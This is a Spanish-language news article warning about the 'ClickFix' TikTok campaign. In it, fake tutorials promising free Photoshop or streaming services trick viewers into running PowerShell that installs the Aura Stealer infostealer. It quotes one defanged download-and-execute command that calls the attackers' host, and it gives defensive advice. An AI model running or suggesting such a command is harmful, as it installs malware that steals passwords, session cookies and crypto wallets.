Cuidado con los tutoriales virales: así operan las estafas que ofrecen servicios premium sin pagar

TikTok, una de las plataformas más populares del mundo, se ha convertido también en un terreno fértil para el fraude digital. En los últimos días, expertos en ciberseguridad han alertado sobre una nueva campaña maliciosa que utiliza videos aparentemente inofensivos para engañar a los usuarios y comprometer la seguridad de sus dispositivos. El ataque aprovecha la confianza que millones de personas depositan en los contenidos de esta red social, especialmente en aquellos que prometen soluciones rápidas o beneficios gratuitos.

La amenaza fue identificada por investigadores del SANS Internet Storm Center, quienes advierten que los atacantes están publicando tutoriales falsos que enseñan supuestos métodos para acceder gratis a servicios de pago, como Netflix, Spotify, Windows o Photoshop. Sin embargo, detrás de estos videos se ocultan comandos que instalan software malicioso en los equipos de las víctimas.

Aunque el formato de los videos resulta familiar —breves, directos y con instrucciones simples—, su verdadero propósito es ejecutar códigos diseñados para robar información sensible y abrir la puerta a otros ataques. Los expertos recomiendan desconfiar de cualquier contenido que prometa obtener beneficios sin costo o activar programas sin licencia.

Una campaña bautizada como “ClickFix”

El ataque ha sido bautizado como ClickFix, y se basa en un patrón común en TikTok: tutoriales que muestran comandos para copiar y pegar en el sistema operativo, generalmente a través de PowerShell, una herramienta de administración avanzada en Windows.

De acuerdo con el analista de seguridad Xavier Mertens, uno de los ejemplos más difundidos es un video que supuestamente enseña cómo activar Photoshop gratis. En la pantalla aparece el siguiente comando:iex (irm slmgr[.]win/photoshop)

Aunque parece inofensivo, este código se conecta en segundo plano con un sitio remoto desde el que descarga y ejecuta otro script malicioso. En cuestión de segundos, el sistema queda comprometido.

El investigador advierte que este método es especialmente peligroso porque no requiere que el usuario descargue ningún archivo. Basta con ejecutar el comando para que el malware entre en acción sin levantar sospechas.

Qué hace el malware instalado

Los expertos han identificado que uno de los programas descargados por este método es una variante del Aura Stealer, un tipo de malware diseñado para robar información confidencial. Este software puede extraer contraseñas almacenadas, cookies de sesión e incluso datos de carteras de criptomonedas.

Además, los investigadores sospechan que el segundo componente del ataque funciona como un cargador de código, lo que permite a los atacantes añadir nuevas funciones o descargar otros virus en el futuro. En otras palabras, el sistema de la víctima queda permanentemente vulnerable, incluso si el primer malware es eliminado.

Los daños pueden ir más allá del robo de datos personales. Este tipo de infecciones también se utilizan para secuestrar cuentas, distribuir spam o convertir los dispositivos en parte de una red de bots que realizan ataques automatizados.

Qué recomiendan los expertos

Frente a esta nueva ola de estafas, los especialistas en ciberseguridad insisten en mantener una regla básica: nunca ejecutar comandos ni scripts que provengan de redes sociales o fuentes desconocidas.

También recomiendan instalar soluciones antivirus actualizadas, evitar descargas fuera de los canales oficiales y desconfiar de cualquier método que ofrezca acceso gratuito a servicios o software de pago. En caso de haber ejecutado comandos sospechosos, se aconseja realizar un análisis completo del equipo y cambiar todas las contraseñas vinculadas al navegador o aplicaciones.

Las plataformas sociales, por su parte, enfrentan el desafío de detectar y eliminar este tipo de contenidos antes de que lleguen a más usuarios. Sin embargo, la velocidad con la que se propagan los videos y la facilidad para replicar las estafas complican la tarea.